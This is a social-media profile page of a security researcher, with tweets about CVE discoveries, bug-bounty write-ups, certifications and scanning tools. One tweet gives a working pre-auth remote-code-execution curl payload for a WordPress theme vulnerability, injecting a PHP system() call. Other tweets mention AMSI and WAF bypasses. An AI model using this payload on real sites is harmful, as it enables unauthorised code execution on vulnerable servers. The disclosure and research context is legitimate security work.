Mesh3l @Mesh3l_911 Twitter profile

Pinned Tweet

Mesh3l

3 years

السلام عليكم. I believe that (the sky ain’t even a limit for me) هنا بإذن الله بتلقون كل شي عنّي: -Who Am I? -WORK EXPERIENCE -CERTIFICATIONS -PERSONAL PROJECTS -CVEs -Acknowledgments -Competitions -Articles -POCs & Automation -Accounts -Images

15

21

206

Last Seen Profiles

@SNMlibaaxyo

@CatharineR93666

@skalska_o

@whoreandsissiy

@OneaBiank

@InHear2

@Dino_Never_Bow

@CynicalBong

@pmjamilla

@AmanMau65643958

@TMitch8988

@hyolyoon

@phnth_prasm

@Thani1978

@MarkKnopfler

@RutileArts

@phnth_prasm

@cutekaterina18s

@academic212

@lxx322219

@VeeNguyen99

@stw_pdg

@gerardofdzmx

@bokeplokalmalam

@nikhil_mitt

@stw_pdg

@BobbyRooneyy

@Mexia_ISD

@MrugbyYoshi

@FindomRose18

@KhoiLe2003

@Brunocomunika

@prosta_ul1k

@CGS_RSA

Mesh3l

@Mesh3l_911

4 years

صبّحكم الله بالخير ، خلونا نشوف على السريع طريقة أحد الباحثين في إكتشاف ( ثغرة SSRF بشركة FaceBook ) ومكافأته بمبلغ 37500 ريال . بحاول أشرحها بالتفصيل ، بإذن الله ماتطلع من الموضوع إلّا وأنت فاهم كل الخطوات 👍🏻

13

43

438

Mesh3l

@Mesh3l_911

4 years

صبّحكم الله بالخير ، الأيام هذي جالس أجهّز وأرتّب للـ BugHunting في الإجازة بإذن الله فقلت آخذكم معي بشرح بيفيدكم إن شاء الله. بعشر دقايق وبأقل من 20 ريال ، تسوي السيرفر الخاص فيك اللي راح يساعدك كثيير كـ PT أو BugHunter بالسّرعة والآداء والمساحة والـ Ports forwarding وغيرها .

11

65

422

Mesh3l

@Mesh3l_911

2 years

الحمد لله. اللّهم لا علم لنا إلا ما علّمتنا إنك أنت العليم الحكيم.

76

21

339

Mesh3l

@Mesh3l_911

4 years

صبّحكم الله بكل خير أغلبكم يعرف ثغرات الـ Open Redirection تصنيفها في منصّات مكافئة الثغرات بالغالب يكون Low فهذا بإذن الله بيكون مرجع للجميع في : Open Redirection escalations تصعيد مستوى خطورة الثغرة لقيت ثغرة Open Redirection؟؟ قبل تجهّز الريبورت خذ لك نظرة وجرّب👍🏻

8

60

309

Mesh3l

@Mesh3l_911

2 years

السلام عليكم ورحمة الله وبركاته. يالله حيّهم ^_^ Debugging JavaScript Based Web Apps Locally Using VSCode شرح تأسيسي لعلّه بإذن الله يفيد أحد، دعواتكم لي ولوالدي ولمن يعز علي. قراءة ممتعة♥️🙏🏻 ملاحظة: باقي اللغات تقريبا نفس المبدأ.

6

45

296

Mesh3l

@Mesh3l_911

3 years

•SSL Pinning Bypass •Network traffic Analysis •Basics Dynamic Analysis (Genymotion,adb,Frida,Objection) •Basic Static Analysis (Jadx) •Weak Encryption Algorithm •Password list (Crunch+Custom Java script) •Account TakeOver قراءة ممتعة♥️🙏🏻

10

64

288

Mesh3l

@Mesh3l_911

3 years

السلام عليكم. أداتي الخاصة في إستخراج ملفات الـ JS (عيدية) مقارنةً ( ولو إني ماأحب المقارنات ) بـ LinkFinder اللي شغال عليها 13 contributors ومنهم @EdOverflow أقدر وبكل فخر أقول ( أفضل منها ) والحكم لكم 👍🏻👌🏻 POC: Tool’s Repo:

16

55

256

Mesh3l

@Mesh3l_911

4 years

صبّحهم بالخير✋🏻،إنتهيت قبل كم ساعة من النسخة التجريبية من SQLi_Checker ، وهو سكربت لفحص المواقع من ثغرة SQLi بإستخدام common techniques ،صراحة ترددت في نشره لكن نقول إن شاء الله يستخدم للفائدة ^_^راح يوفّر عليكم الكثييييير من الوقت. موفقين Happy Hunting

GitHub - Mesh3l911/SQLi_Checker

Contribute to Mesh3l911/SQLi_Checker development by creating an account on GitHub.

github.com

13

29

237

Mesh3l

@Mesh3l_911

4 years

مسّاكم الله بالخير، مثل ماوعدتكم أداتي الخاصة في فحص SubDomains TakeOver Vulnerabilities أداة Sub Analyser : هي أداة لفحص ثغرات الصب دومينز تيك اوفر ، فيها 36 services بعضها من @EdOverflow repo [ can-i-take-over-xyz ] وبعضها من تجربتي السابقة

GitHub - Mesh3l911/Sub_Analyser

Contribute to Mesh3l911/Sub_Analyser development by creating an account on GitHub.

github.com

16

54

242

Mesh3l

@Mesh3l_911

3 years

السلام عليكم. Sub Search: أداة لإستخراج كل الـ Sub-Domain levels عن طريق التخمين للـ forward DNS lookup ( A records ) بتفيدكم جدا بحكم أغلب أدوات الصب دومينز المعروفة ماتشتغل recursively وتكتفي بـ lvl1 POC: Repo: دعواتكم♥️🙏🏻

17

35

232

Mesh3l

@Mesh3l_911

3 years

اللهم لك الحمد والفضل والمنّة. My 2021 CyberSecurity achievements: ممتن لكل شخص كان سبب بعد الله ولو بعلومة بسيطة جداً. بإذن الله 2022 تكون أفضل بكثير. Ref: ♥️🙏🏻

27

22

222

Mesh3l

@Mesh3l_911

4 years

صبّحكم الله بالخير✋🏻وأخيرا مثل ماوعدتكم،النسخة الرسمية الأولى من SQLi_Checker النسخة التجريبية كانت 73 سطر برمجي وهذي النسخة 570 سطر ، تطوير جذري وكمّية مجهود مايعلم فيها إلّا الله لكن ماتغلا عليكم 👍🏻 راح تفيد ال PT & BugHunters وتختصر عليهم وقت كبييير جدا جدا . تابعوا الثريد

11

28

206

Mesh3l

@Mesh3l_911

3 years

السلام عليكم ورحمة الله وبركاته، Referrer Header Bypass > CSRF > Running Process endpoint > RCE > 0days > 3 CVEs > Webmin HOF قراءة ممتعة ودعواتكم 🙏🏻

Referrer Header Bypass > CSRF > Running Process endpoint > RCE > 0days > 3 CVEs > Webmin HOF

بسم الله الرحمن الرحيم

mesh3l-911.medium.com

13

51

209

Mesh3l

@Mesh3l_911

2 years

السلام عليكم ورحمة الله وبركاته. Dependency Confusion يمكن كثير منكم سبق وسمع عن بعض الـ Supply Chain Attacks وبالتحديد هذا الـ Attack اللي كانت نتيجته الوصول لـRCEs على جهات كبرى مثل Microsoft, Apple وغيرها قراءة ممتعة ودعواتكم لي ولوالدي ولمن أعز♥️🙏🏻

12

44

214

Mesh3l

@Mesh3l_911

2 years

السلام عليكم ورحمة الله وبركاته. Authenticated Stored XSS Affects ALL Drupal Core Versions (لاتفتحه بإستخدام الجوال، فوضى) قراءة ممتعة♥️🙏🏻

6

34

197

Mesh3l

@Mesh3l_911

4 years

صبّحكم الله بالخير ، Write-up: Recon > Code Review > 0day > CVE-2021–3138 > Apple HOF دعواتكم♥️🙏🏻

Recon > Code Review > 0day > CVE-2021–3138 > Apple HOF

بسم الله الرحمن الرحيم

mesh3l-911.medium.com

38

42

203

Mesh3l

@Mesh3l_911

1 year

الحمد لله. فخور جدا لإختيار بعض من إنجازاتي المتواضعة في مجال الأمن السيبراني لتكوّن #قصة_نجاح في منظومة مليئة بكوكبة من المُبدعين المتمّيزين ( @McitGovSa ). بقيادة المُلهمين معالي الوزير المهندس عبدالله السواحه @aalswaha ومعالي نائب الوزير المهندس هيثم العوهلي @halohali

52

33

187

Mesh3l

@Mesh3l_911

3 years

موضوع جديد. شرح مفصّل لإكتشاف وإستغلال SQL Injection in the core of Wordpress (CVE-2022-21661) بالعربي والـ English. قراءة ممتعة♥️🙏🏻

Confidential

@_ConfLab

3 years

Detailed Static/Dynamic analysis for(CVE-2022-21661) قام فريقنا بعمل تحليل بكامل التفاصيل Statically/Dynamically بإستخدام VS Code لإكتشاف وإستغلال ثغرة الـ SQLi in the core of Worpress (CVE-2022-21661) ملاحظة:تم عمل Plugin خاصة لجزء الـ Dynamic Analysis

0

15

60

8

29

189

Mesh3l

@Mesh3l_911

1 year

السلام عليكم ورحمة الله وبركاته، مقطع رهيب تشوف فيه جانب من الـ security researcher mindsetفي بداية أي research ومتأكد أغلب اللي يشتغلون source code reviewيمرون على هالـ approach بشكل مستمر. للّي عنده الأساسيات وودّه يبدأ بهالمجال بحط كم مصدر بشكل عشوائي لعلها تفيد لو شخص واحد.

LiveOverflow 🔴

@LiveOverflow

1 year

I was looking at some WordPress code, had an idea. Immediately I went down a rabbit hole 🐇 trying to find a cool security bug. So let me take you along this journey to see how security research can look like. And why it's still useful, even if we fail in the end.

15

67

507

7

33

187

Mesh3l

@Mesh3l_911

1 year

الحمد لله. بفضل من الله سبحانه، Officially -> GIAC Exploit Researcher and Advanced Penetration Tester ( #GXPN ) certified.

54

11

190

Mesh3l

@Mesh3l_911

1 year

الحمد لله، New CVE: CVE-2023-4059 ——— [+] Affected Product: WordPress (Profile-Builder) plugin [+] Vuln: Pre-auth Forms Creation [+] Active Installations: +60,000 (One of the popular WordPress free plugins) ——— Quick blog:

29

43

174

Mesh3l

@Mesh3l_911

4 years

مسّاكم الله بالخير ، اليوم موضوع كان بخاطري أشرحه لكم وجاء وقته هي والله موضوعين بموضوع واحد الأول : إضافة Python Environment للـ Burp Suit والثاني : طريقة الإستفادة منها في وحدة من طرق تخطي الـ Rate Limit بسم الله ..

9

28

172

Mesh3l

@Mesh3l_911

4 years

*مؤقتة* إكتسابك للعلم والخبرة بأي مجال شي سهل نسبيّا بإجتهادك وبمرور الوقت ، لكن الشي الصّعب والنعمة من الله (محبّة الناس والسمعة الطيّبة). لاتتعالى بعلمك فتفقد الأهم. الأولى زائلة .. والثانية دائمة

2

29

170

Mesh3l

@Mesh3l_911

3 years

الحمد لله. Next ...

41

7

159

Mesh3l

@Mesh3l_911

3 years

سلام عليكم -Blind Command Inj ( White box ) -Blind Command Inj ( Black Box ) -Out Of Band technique -DNS Exfiltration -AWS ( EC2, inbound rules ) + Godaddy -Burb Collaborator , Responder , Tcpdump , Bind9 DNS Server قراءة ممتعة ودعواتكم♥️🙏🏻

Out Of Band technique - DNS Exfiltration

بسم الله الرحمن الرحيم

mesh3l-911.medium.com

16

29

152

Mesh3l

@Mesh3l_911

3 years

اللهم لك الحمد. 2 Go ⏳: ⁃OSCP ⁃OSWE ⁃CRTO ⁃OSEP ⁃Malware Development ( Sector 7 ) both ( 1 & 2 ) ⁃OSED ⁃Advanced Web Hacking ( notsosecure ) ⁃GWAPT ⁃GPEN If u got me any other suggestions for my learning path I’d be more than thankful 🙏🏻

37

11

154

Mesh3l

@Mesh3l_911

3 years

صبحكم الله بالخير، Sub domain TakeOver + External File Hijacking ( BLH attack ) > XSS فالبداية وش هي BLH attack ؟ بإختصار Broken Links Hijacking هي روابط مستخدمة في تطبيق الهدف لكن بطريقة أو بأخرى صارت تحت تحكم المُهاجم. قراءة ومشاهدة ممتعة ♥️🙏🏻

11

26

151

Mesh3l

@Mesh3l_911

7 months

[+] Pre-auth RCE POC: echo -e "\n" && curl -X POST -H 'Content-Type: application/json' -H 'Host: localhost' -d '{"nonce":"4d948b6848","postId":"164","element":"911","loopElement":{"settings":{"query":{"useQueryEditor":"","queryEditor":"echo+system(\u0027id\u0027);"}}}}'

The Hacker News

@TheHackersNews

8 months

⚠️ Critical security flaw (CVE-2024-25600) in Bricks theme for #WordPress (used by 25,000+ sites) is being exploited by attackers to run malicious PHP code on vulnerable installations. Learn more: #cybersecurity #hacking

5

129

229

15

38

154

Mesh3l

@Mesh3l_911

4 years

قصّة وحدة من طرق تخطي كثير جدا للـ WAFs and Security rules واللّي هي مستخدمه بكثرة في تخطّي 403 Forbidden المصدر : @PortSwiggerRes من المبدع: @albinowax الطريقة هي: Local Route Poisoning بالتوفيق ودعواتكم🙏🏻 Happy Hunting

3

17

147

Mesh3l

@Mesh3l_911

3 months

السلام عليكم ورحمة الله وبركاته، كل عآم وأنتم بألف خير بعد الزحمة. جايييييينكمم بإذن الله⌛️👀👇🏻👇🏻 @_Cyberna

47

28

136

Mesh3l

@Mesh3l_911

3 years

السلام عليكم ورحمة الله وبركاته. JSON Web Key Sets Spoofing (JWKS Spoofing) موضوع راح يفيد الـ PTs/Developers بإذن الله قراءة ممتعة♥️🙏🏻 ملاحظة: أنا ونخبة من المبدعين نكتب بعض المواضيع من وقت للثاني في هذا الحساب @ConfidentialTM Happy Reading ^_^ ♥️

4

16

109

Mesh3l

@Mesh3l_911

3 years

السلام عليكم ورحمة الله. كتبت تحدي ويب يحتاج شوي Code Review لحلّه، بإذن الله تطلعون منه بفايدة. ممكن أشرح الـ Attack بالتفصيل مستقبلا إن شاء الله بس أهم شي تحاولون بالتحدي قبلها. Happy Testing ♥️🙏🏻 http://54.205.126.111:5000

10

12

107

Mesh3l

@Mesh3l_911

1 year

الحمد ��له. 🥇 Exploit Researcher and (AdVAnCEd) Penetration Tester - GXPN CTF

44

6

103

Mesh3l

@Mesh3l_911

2 years

وش نصائحك لشخص بادي ف اختبار اختراق ال Web application as whitebox — قبل أبدأ ودي ما تكتفي بكلامي وتقرأ وتسمع من أكثر من مصدر. راح أعتبر إن عندك أساسيات الـ Web App Security as a BlackBox Approach وحاب تبدأ بمجال الـ Sour…

2

8

102

Mesh3l

@Mesh3l_911

3 years

السلام عليكم،مسّاكم الله بالخير. Shell_Escaper v1.0: extracting the Shell Escape Sequences for Binaries with Setuid bit and Sudo out of GTFOBins with three differint ways both locally and remotely بإذن الله بتختصر عليكم الوقت بشكل كبير دعواتكم🙏🏻

5

17

84

Mesh3l

@Mesh3l_911

2 years

الحمد لله. للمرّة الثانية وبأقل مجهود تم وضع اسمي بصفحة شركة (آبل) #Apple HOF لإكتشافي وتبليغي ثغرة أمنية بأحد تطبيقات المواقع التابعة لهم. ممكن مستقبلا بإذن الله أشرح الثغرة بالتفصيل. 🇸🇦🇸🇦🇸🇦

0

6

80

Mesh3l

@Mesh3l_911

3 years

اللهم لك الحمد، صراحة فيه شي أنا ( شخصياً ) أعتبره إنجاز لي وودي أشاركه معكم فكرة إنك تكون مساهم ولو بشي بسيط جدا في تطوير مصدر من أكثر مصادر العالم شهرة في مجالك شي عظيم كان عندي ملاحظة على تعريف ثغرة SSRF في Portswigger Academy. أرسلت لهم واليوم تم التعديل عسى الله ينفع به

12

13

82

Mesh3l

@Mesh3l_911

3 years

. الحمد لله ما أنتهى دربُ ولا ختم جهدُ ولا تم سعيُ إلا بفضله. تم بحمد الله حصولي على درجة البكالوريوس من جامعة الملك فهد للبترول والمعادن @KFUPM سائلا المولى عز وعجل أن يوفقنا وياكم. تحت جمعت بعض اللقطات من تصويري للجامعة وأضفت عليها كم مقطع من تصوير الغير💔 #kfupm

53

4

80

Mesh3l

@Mesh3l_911

3 years

السلام عليكم ورحمة الله وبركاته، عندي موضوع حاب أشرحه لسببين صراحة : 1-غالباً لاتعتمد أبدا على مصدر واحد يعطيك تعريف عن ثغرة مهما كان موثوق. 2-السبب الثاني يخص الموضوع نفسه DNS A record’s Subdomain TakeOver ممكن بعده تبدأ تفكر غير وتعدل الـ Methodology الخاصة فيك

2

16

74

Mesh3l

@Mesh3l_911

7 months

السلام عليكم ورحمة الله وبركاته، الله يحيّيكم جميع في بوث #Cyberani في #LEAP24 ، مجهّزين لكم CTF بيعجبكم بإذن الله والكل يقدر يشارك وبكافة المستويات 👌🏻 وبيكون فيه عدد كبير من الـ - Flipper Zero - YubiKey Security Tokens - COINS وغيرها من الجوائز. طبعا هذي من غير الجائزة

Cyberani | سيبراني

@Cyberani_sa

7 months

We are happy to announce that we will organize a contest for the #cybersecurity specialists 🛡️ Visit our booth at LEAP event to register in our #CTF contest and win highly valuable prizes. ▫️Prizes will be for the 20 highest-ranking on the Leader board ▫️Registration begins at

0

6

28

11

18

81

Mesh3l

@Mesh3l_911

7 months

السلام عليكم ورحمة الله وبركاته، أشكر كلّ من حضر في سيبراني بوث @ #LEAP24 وأبارك للفائزين في مسابقة الـ CTF. الشي الثاني، زي ماوعدناكم للي ماقدر يحضر رفعنا لكم كل التحدّيات للفائدة http://18.215.144.52/ المدة: 3 أيام بإذن الله. Enjoy♥️🙏🏻 دعواتكم والشهر عليكم مبارك 🌙

5

19

79

Mesh3l

@Mesh3l_911

3 years

اللهم لك الحمد ، الله يجعلها فاتحة خير 🙏🏻 @SynackRedTeam

30

5

77

Mesh3l

@Mesh3l_911

3 years

السلام عليكم. أوتوميشن بسيط لثغرات الـ Open Redirection كتبته عالسريع بس المرة ذي مابنزل الكود كامل بعطيكم المهم منّه والهدف: 1-تعوّد نفسك على البرمجة بشكل عام والأوتوميشن بشكل خاص 2-تفهم الفكرة وتكتب الكود بطريقتك الخاصة أي مساعدة موجود بإذن الله. Happy Hunting🙏🏻 دعواتكم

3

13

68

Mesh3l

@Mesh3l_911

3 years

ماتغلا عليكم. قريبا بإذن الله🙏🏻

Z0ldyck

@electronicbots

3 years

0day? @Mesh3l_911

0

2

17

6

7

66

Mesh3l

@Mesh3l_911

15 days

الحمد لله. بفضل من الله عزّ وجلّ، GIAC Cloud Penetration Tester ( #GCPN ) ✔️

GIAC Cloud Penetration Tester (GCPN) was issued by Global Information Assurance Certification...

The GIAC Cloud Penetration Tester (GCPN) certification validates a practitioner's ability to conduct cloud-focused penetration testing and assess the security of systems, networks, architecture, and...

www.credly.com

13

2

71

Mesh3l

@Mesh3l_911

4 years

اللهم لك الحمد ، Apple HOF 🇸🇦

29

11

64

Mesh3l

@Mesh3l_911

2 years

MITREشدعوة مستعجلين! Webmin Multiple CSRF/RXSS lead to 1 click RCE through[File Manager, Cron Jobs, Upload/Download and adding a privileged user] CVE-2021-32156 CVE-2021-32157 CVE-2021-32158 CVE-2021-32159 CVE-2021-32160 CVE-2021-32161 CVE-2021-32162 Teammate: @electronicbots

9

8

63

Mesh3l

@Mesh3l_911

4 years

السلام عليكم ، موضوع مر علي وأنا أسوي سكربت بسيط ، وقلت أنقله لكم على السريع وهو بخصوص بخصوص Python subprocess Module إستخدام خاطئ=ثغرة خطيرة جدا فالبداية هذا تعريف بسيط بالـ Module

2

10

61

Mesh3l

@Mesh3l_911

2 years

الحمد والفضل لله سبحانه. ذَريني أَنَل ما لا يُنالُ مِنَ العُلى ،،، فَصَعبُ العُلى في الصَعبِ وَالسَهلُ في السهل جاء الوقت اللي اقول فيه بإذن الله الحححلم وتعب شهور طويلة لفريق من المميّزين المبدعين جدا > يقتررررب💪🏻، دعواتكم لنا بالتوفيق وترقبوونا⌛️🔥 .

34

14

56

Mesh3l

@Mesh3l_911

1 year

السلام عليكم ورحمة الله وبركاته 0 click auth-RCE POC that I wrote for Elemntor-Pro latest broken access control vulnerability found by @nintechnet Mitigation: Update to >=3.11.7 Ps: Millions of websites might be vulnerable as this plugin has +11M installations.

1

17

54

Mesh3l

@Mesh3l_911

2 years

نصيحة لوجه الله. DO NOT EVER THINK 2 USE DRUPAL

5

53

Mesh3l

@Mesh3l_911

4 years

الحمد لله،حصلت على إعتراف من الفريق الأمني لجامعتي(جامعة الملك فهد للبترول والمعادن @KFUPM ) لإكتشافي ثغرة ( خطيرة ) بأحد أنظمتهم الرئيسية I got acknowledged by KFUPM’s security team @KFUPM for finding a ( Critical ) bug in one of thier main systems #kfupm

16

8

48

Mesh3l

@Mesh3l_911

4 years

اللهم لك الحمد والشّكر ، من يروم المعالي مايهاب الصعود ومن رضى بالمعونة عاش في ذلّها للعام الثاني على التوالي نفوز بالمركز الأول بمسابقة CyberHub CTF على مستوى طلاب جامعات المملكة 🏆🥇😻🔥🔥 مع المُبدعين جدّا BloodHunters Team @_Sp3eD @blackfishx86 @5ch1zo @Slo3w_

15

4

43

Mesh3l

@Mesh3l_911

3 years

اللهم لك الحمد 🏆🥇 مع المبدعين : @BassamAssiri @0xRaw @kira_321k + خالد العصيمي " إن لم يكن مركزي بالصّف الأول أمام ماعاد تفرق معي لو كنت قبل الأخير "

كلية علوم الحاسب وتقنية المعلومات (CCSIT)

@IAU_CCSIT

3 years

مبروك لفريق Potato الفائز بالمركز الأول 👏🏽 مشعل المنصور بسام عسيري راوي الجريفاني عبدالعزيز الشايع خالد العصيمي

3

7

42

19

6

42

Mesh3l

@Mesh3l_911

2 years

إذا فيه بودكاست مستعد أدفع له شهريا فبيكون وبدون أي تردد (بودكاست سوالف بزنس) @dubayan @thmanyah بالمختصر بتسمع خبرة سنوات في دقايق، بعض التجارب كفيلة بإنها توفّر عليك وقت كبير جدا في مشروعك. الله يبيض وجيههم ويجزاهم خير. للي باقي مايعرفونه، تفضلوا.

بودكاست سوالف بزنس

بودكاست للمهتمين بالبزنس وريادة الأعمال، مع مشهور الدبيان. كل حلقة راح تسمع تجربة شخص في البزنس بتفاصيلها، بدون مجاملات أو تنظير.

www.youtube.com

1

3

40

Mesh3l

@Mesh3l_911

3 years

اللهم لك الحمد Mitigation: Consider an update to the latest version 1.974 Or add referers_none=1 to /etc/webmin/config POCs : 7 more CVE’s eXploits will be published soon in our github Great teamwork @electronicbots الرايت اب قريب بإذن الله🙏🏻

Z0ldyck

@electronicbots

3 years

In the last month I worked with @Mesh3l_911 in finding bugs at Webmin, and we were able to register 3 CVEs and 7 more are being registered CVE-2021-31760 CVE-2021-31761 CVE-2021-31762

14

66

11

37

Mesh3l

@Mesh3l_911

4 years

الويكند يجمعنا بإذن الله ... Stay tuned 👍🏻

8

1

35

Mesh3l

@Mesh3l_911

4 years

وأخيرا أتمنى والله إنها تفيد ولو شخص واحد فقط . واللهم إنّي أبرأ إليك من أي استخدام بطريقة غير قانونية. موفقين ودعواتكم 😋🙏🏻 Happy Hunting

GitHub - Mesh3l911/SQLi_Checker_v1.1

Contribute to Mesh3l911/SQLi_Checker_v1.1 development by creating an account on GitHub.

github.com

1

4

34

Mesh3l

@Mesh3l_911

2 years

أهلًا تخصصي علوم حاسب وممتاز معدلي لكن للأسف من جهة الخبرة والمهارات وغيره زيرو.. وأجد اهتمامي وبناءً على اطلاعي … — بإذن الله تتقدم خطوات وخطوات، شوف ياطويل العمر، أنت عندك نقطتين خلنا نقول إيجابية: 1-أنت خريج CS فنقول من المفت…

Mesh3l_911

CuriousCat is a Q&A social network that allows you to connect with your followers and know new people.

curiouscat.live

1

3

30

Mesh3l

@Mesh3l_911

2 years

الحمد لله، وأبشروا بالعوض 🙏🏻 🇸🇦 . .

HitmanAlharbi

@HitmanF15

2 years

الحمدلله حصلنا على المركز الثاني مع المبدعين @Mesh3l_911 @0xiMazen @electronicbots 😍❤️ على مستوى العرب في @Cyber_Talents عدد الدول المشاركة 21 دولة و 467 فريق ونوعدكم بالافضل المرات الجاية

55

17

122

5

1

30

Mesh3l

@Mesh3l_911

11 months

5

0

28

Mesh3l

@Mesh3l_911

4 years

أخيراً زي ماأقول بكل مرة ، أتمنى يستفيد من الموضوع ولو شخص واحد فقط . المصدر ، الباحث المبدع : @amineaboud تلاقون الـ write-up الأصلي بحسابه . موفقين ودعواتكم 🙏🏻 Happy Hunting.

3

0

26

Mesh3l

@Mesh3l_911

4 years

ودّي أعطي نبذة بسيطة جدا أو تعريف مختصر عن نوع من أنواع الهجوم اللي أشوفه مهمل عندنا بس قبل ندخل فالموضوع ، هنا الصديق عبدالعزيز العنزي كان عنده مشروع لمادة بالجامعة واختار تطبيق هذا النوع من الهجوم ( شي تعودنا نشوفه غالبا فالأفلام ^_^ )

AbdulAziz

@Cc_Coper

5 years

a simple Replay 😌

6

15

1

4

23

Mesh3l

@Mesh3l_911

4 years

1) Subdomains Enumeration: طيب إيش كان الهدف منها ؟ نشوف

2

1

24

Mesh3l

@Mesh3l_911

7 months

حياااااااكم الله، التحدّيات والجوائز ومن قبلها المُبدعين في إنتظاركم عدد كبير من الجوائز وبيكون فيه تقريبا 20 فائز يوميّا بإذن الله (Top 20 In Leaderboard) يعني إحتمالية فوزك كبيرة جدا مكان البوث📍: 𝗦𝘁𝗮𝗻𝗱 𝗡𝗼: 𝗛𝟮.𝗛𝟭 -فيه 11+ Flipper Zero 😉 Enjoy♥️ #LEAP24 #ليب24

Mesh3l

@Mesh3l_911

7 months

السلام عليكم ورحمة الله وبركاته، الله يحيّيكم جميع في بوث #Cyberani في #LEAP24 ، مجهّزين لكم CTF بيعجبكم بإذن الله والكل يقدر يشارك وبكافة المستويات 👌🏻 وبيكون فيه عدد كبير من الـ - Flipper Zero - YubiKey Security Tokens - COINS وغيرها من الجوائز. طبعا هذي من غير الجائزة

11

18

81

4

24

Mesh3l

@Mesh3l_911

1 year

حسبي ربّي ونعم الوكيل 🤲🏻

1

2

23

Mesh3l

@Mesh3l_911

2 years

Just got a new Offensive Security credential via @Accredible for via @offsectraining

OffSec Web Expert (OSWE) • Meshal Mane Ali Alyami • Cybersecurity Training Badges from OffSec

Home of digital credentials

www.credential.net

1

24

Mesh3l

@Mesh3l_911

4 years

فالنهاية عندي نقطتين،الأولى هي إن الموضوع تقريبا أخذ مني 8 ساعات متقطّعة مابين ترتيب الشرح وبين حل بعض اللابات فلا أحد يشره إذا فيه غلط بسيط الشي الثاني اللي عنده أي فكرة زيادة يضيفها،فالأول والأخير هذا مرجع للـ Open Redirection Escalations دعواتكم🙏🏻 وكالعادة Happy Hunting😋

3

5

22

Mesh3l

@Mesh3l_911

3 years

اللهم لك الحمد. 🏆🥇

HitmanAlharbi

@HitmanF15

3 years

فريق مين الي فاز 😜 فريقنا كان مكون من المبدعين: @Mesh3l_911 @Liliexx2 وعبدالعزيز الحربي من المدينة ✌🏼 شكرا شركة وتد @watadenergy

24

14

39

3

1

21

Mesh3l

@Mesh3l_911

3 months

البارح شفتوا لمحة بسييطة عن جزئية الطلّاب وأبوفهد هنا أعطى لمحة بسيييطة لبعض المميّزات اللي بتكون في لوحة التحكم الخاصة بالمعلمين عشان يقدمون كورساتهم بأفضل طريقة ممكنة من إنشاء مسابقات لطلّابهم وإدارة محتوى وإدارة الأسئلة والكوبونات وغيرهاااا. جهّزوا كورساتكم يا أهل الخبرة⌛️👀

BugsBunny

@0xiMazen

3 months

اهلا بالجميع مساكم الله بالخير وكل عام وانتم بخير 🌹 اللهم لك الحمد ،شعور جميل جدا لما تشوف فكرة تتحول إلى واقع .. @_Cyberna باذن الله قريباً الكل راح يستمتع بتجربة تعليم وتعلُمْ فريدة من نوعها 😊

5

9

52

3

4

20

Mesh3l

@Mesh3l_911

4 years

وزي ماأقول دائماً وأبداً ( ياليت الشرح والله يفيد ولو شخص واحد فقط . دعواتكم 🙏🏻 Happy Hunting

2

0

18

Mesh3l

@Mesh3l_911

1 year

نبدأ بشكل عام، هنا الرهيب @0xBoku بياخذك في رحلة من بداية إختيار التارقت للـ env setup لبعض أساسيات PHP Debugging with PHP-XDebug وتفعيل الـ Queries logging وأخيرا إكتشاف الثغرة source to sink approach

Beginners Guide to 0day/CVE AppSec Research

0xboku.com

1

0

16

Mesh3l

@Mesh3l_911

4 years

تهقون سحب على الدومين وراح يشوف غيره ؟ الجواب : ابداً ، بالعكس بدأ يتقدم خطوة للأمام ، وقرر يسوي خطوته الثانية وهي 2) JS Files bruteforcing طيب وش يعني ذي ؟ نشوف

1

0

16

Mesh3l

@Mesh3l_911

2 years

لكل روّاد الأعمال فالمجال Recommended فكرة جميلة جدا من @NakerahNetwork الله يجزاهم وضيوفهم ألف خير🙏🏻♥️

Muhammad Alharmeel

@0xMuhammad

3 years

أول حلقة من الموسم الثاني منPodcast @NakerahNetwork كان ضيفنا فيها @0x4148 يشاركنا خبراته وتجاربه كعضو مؤسس في شركة @RedForceSec كيف كانت البداية والتحديات المتوقعة عند خوض تجربة انشاء شركة جديدة. الحلقة تقديم @1nclud3 وإعداد @0xMohamedhasan #أمن_المعلومات

0

17

82

1

4

16

Mesh3l

@Mesh3l_911

7 months

الله يعطيكم العافية جميعًا، على إنّها كانت للفائدة إلّا إنّي شفت تنافس رهيب جدا الله لايضرّكم. الـ Top 5 المبدعين جدّا, ولاعليكم أمر تتواصلون مع: @m0ssa3li نلقاكم على خير بإذن الله ودعواتكم♥️🙏🏻

5

1

16

Mesh3l

@Mesh3l_911

3 years

هنا مقطع فيديو سويته يوضح كل اللي فوق External Files Hijacking ( BLH attacks ) POC

External Files Hijacking (BLH attacks)

Beyond Subdomains TakeOverTwitter: Mesh3l_911Blog:https://mesh3l911.github.io/tabs/about

www.youtube.com

1

16

Mesh3l

@Mesh3l_911

4 years

الأداة أستخدمها من وقت طويل وبإذن اللي ماتنام عينه راح تساعدكم كثيييير جدا وتحفظ عليكم الوقت خصوصا لو كنت ناوي تفحص +100k صب دومينز. كل شي شرحته بالـ GitHub Repo فوق ، وبرضه تركت لكم رسالة ياليت تشوفونها ^_^ بإذن الله تنفع ولو شخص واحد فقط. دعواتكم🙏🏻 Happy Hunting

3

1

15

Mesh3l

@Mesh3l_911

3 years

البداية ♥️🙏🏻

Confidential

@_ConfLab

3 years

السلام عليكم ورحمة الله. في هذه المقالة طريقة تخطي AMSI عن طريق Memory Patching Technique وفي نهاية المقالة فيه demo بسيط لأداة من عمل الفريق لعمل Memory Patching سيتم نشرها قريبا بإذن الله.

1

3

21

3

4

16

Mesh3l

@Mesh3l_911

10 months

0

16

Mesh3l

@Mesh3l_911

4 years

لاتغرّكم التغريدات اذا شفتوها كثير ترا والله الشغل كله على بعضه ماياخذ منّك وقت خصوصا إذا تعوّدت عليه ، طبّق مرة وحدة وممكن تتعب فيها شوي بس ، والباقية مستقبلا بتكون سهلة وسريعة جدا وآخر شي زي مانقول دايماً ( ياليت الشرح ينفع ولو شخص واحد فقط ) دعواتكم🙏🏻 Happy Hunting

4

0

15

Mesh3l

@Mesh3l_911

4 years

SQLi_Checker v1.1 is l a tool to automate the process of testing websites against different SQLi types . It has various of features as mentioned above This will help out lots of PT & BugHunters by saving ‘em plenty of time #bugbountytips #BugBounty

GitHub - Mesh3l911/SQLi_Checker_v1.1

Contribute to Mesh3l911/SQLi_Checker_v1.1 development by creating an account on GitHub.

github.com

1

5

15

Mesh3l

@Mesh3l_911

2 years

' من لاكرب من شآن داره حزامه ،، ماهُب من اعداد الرجاجيل معدود 🇸🇦

0

4

13

Mesh3l

@Mesh3l_911

4 years

